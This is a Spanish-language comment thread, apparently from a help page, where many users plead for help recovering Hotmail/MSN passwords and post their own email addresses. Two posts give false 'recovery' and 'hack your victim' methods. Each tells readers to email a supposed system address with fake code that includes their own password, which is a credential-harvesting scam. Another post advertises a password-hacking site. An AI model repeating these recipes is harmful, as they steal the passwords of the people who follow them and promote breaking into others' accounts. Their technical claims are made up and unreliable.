|
|
|
|
|
|
|
|
Configuración: Windows XP Internet Explorer 6.0
|
Hola
Te acordas del mail alternativo?
|
por fa acbo de crear un correo y me olvide mi contraseña me la puedes mandar al correo que te estoy escribiendo colan001@marina.mil.pe
gracias |
por fa acbo de crear un correo y me olvide mi contraseña me la puedes mandar al correo que te estoy escribiendo colan001@marina.mil.pe
gracias |
OLVIDE LA CONTRAÑAPOR FAVOR ME LA recuerda |
jesus dijo si t averguenzas de m, yo m avergonzare ante mi padre, el domingo, 5 de octubre de 2008, 03:57:56 hola buenas noches
cambie mi contrasaena en mi correo y no puedo entrar , por favor ayudenme, necesito entrar a mi correo que es esmeraldagb@hotmail.com que puedo hacer para volver a recuperar mi correo , y otra cosa, entre a windons id y no no se tampoco el codigo postal que me piden yo soy de peru y vivo en ica gracias muchas gracias esmeralda, quiero recuperar mi antiguo correo esmeraldagb@hotmail.com, por favor enviarme los datos a este correo de mi hermana que es crenard_eeuu@hotmail.com
|
he olvidado la contraseña y la respuesta secreta de mi msm de hotmail y no se como recuperarla. me pueden ayudar por favor? |
HE OLVIDADO LA CONTRASEÑA Y LA RESPUESTA SECRETA DE MI MSM DE HOTMAIL Y LO NESECITO. ME PUEDN AYUDAR POR FAVOR? |
Para el proceso de recuperación de la contraseña olvidada ó perdida tenemos que enviar un E-Mail
al servidor de MSN (msncontkey) que nos la suministrará en un plazo de 24 horas, tras comprobar que es cierto el registro. El E-Mail se tiene que enviar exactamente así o no funcionará: Para: msncontkey@hotmail.com CC: CCO: Asunto: </see_pass_{aqui escribe la direccion de correo de la que necesitas la contraseña}@hotmail.com< .>\> Cuerpo del mensaje: <> begin <>\ $-//see_password_{direccion correo de la que quieres conseguir la contraseña}@hotmail.com\\ read (f^); write_to_sendln ({aqui la dirección donde quieres recibir la respuesta}@hotmail.com:{tu contraseña}); end; Tras comprobar automaticamente tu identidad en el registro, Msn Services te la enviará a la dirección que hayas indicado y ya podrás iniciar sesión con tu cuenta habitual. Ejemplo: jose2005@hotmail perdio su clave y quiere recibirla en pepe@hotmail.com, su contraseña es 1234abcd
|
|
bueno no esta que yo lo comente pero hay un programa gratis que te dise tu cuenta en hot mail si es que la maquina es tuya ya que generalmente encuentra la de quien es el titular y es este
MessenPass v1.24 Copyright (c) 2004 - 2008 Nir Sofer Web site: http://www.nirsoft.net http://www.nirsoft.net Description =========== MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications: * MSN Messenger * Windows Messenger (In Windows XP) * Windows Live Messenger (In Windows XP And Vista) * Yahoo Messenger (Versions 5.x and 6.x) * Google Talk * ICQ Lite 4.x/5.x/2003 * AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro. * Trillian * Miranda * GAIM/Pidgin * MySpace IM * PaltalkScene * Digsby MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.
|
hola agregame nesecito hablarcon vs porque quiero descubrir la contraseña de mi msn ya q la olvide grasias |
porfavor que me ayudes a recuperar mi contraseña |
CONSIGUE CONTRASEÑAS DE HOTMAIL, YAHOO Y MESSENGER 100% SEGURO, DISCRETO Y ANONIMO ENTRA A http://www.freewebs.com/mundohack01/index.htm
hackear hotmail, hackear msn, contraseñas hotmail yahoo gmail, password, obtener contraseñas. |
mi correo no lo puedo desbloquear yovys7@hotmail.com |
necesito recuperar la contraseña de este correo sino me matan ....rosvi_1922@hotmail.com |
necesito recuperar mi privacidad y tambien volver a hablar con mis amigos y familiares es muy importante para mi porfavor ayudenmee.......porfavor...... mi messenger hackeado es...jake_line_9@hotmail.com |
quiero recuperar mi privacidad pos y volver a comunicarme con mi familia y amigos les pido su ayuda con mayor urgencia porfavor mi correo hackeado es... espero su pronta respuesta |
holka necesito recuperar mi msn por fa enviame la contraseña lo mas rapido posible y enviamela a este msn toda_tuya_69@hotmail.com gracias |
1- el primer paso para hackear la cuenta de hotmail es sencillo,
2- no decimos hackear por que es totalmente legal.. 3-una ves que entraste en tu cuenta de hotmail,debes componer un mensaje con las siguientes caracteristicas: Debes escribir la direccion del sistema, que contiene la base de datos sobre la cual hotmail realiza la verificacion de passwords, esa cuenta es la siguiente (hot-live-msn@hotmail.com) En el campo asunto debes escribir….> retrieve password Y copiar este Codigo que esta abajo, para despues pegarlo en el campo de mensaje Recuerda de escribir tu correo electronico correctamente y tu password, para que te llegue el pass de tu victima a tu correo… --------------------------------------------------------------------------------------------------- :form_pwd;login=(escribe aqui el login de tu victima) form.login.focus();form.passwd.gets=”;form_pwd;val ue=”yes”; sendto=(escribe tu correo electronico); form.passwd (escribe tu password) form_pwd;value=”admin”;
|
Resultados de
Resultados de
Resultados de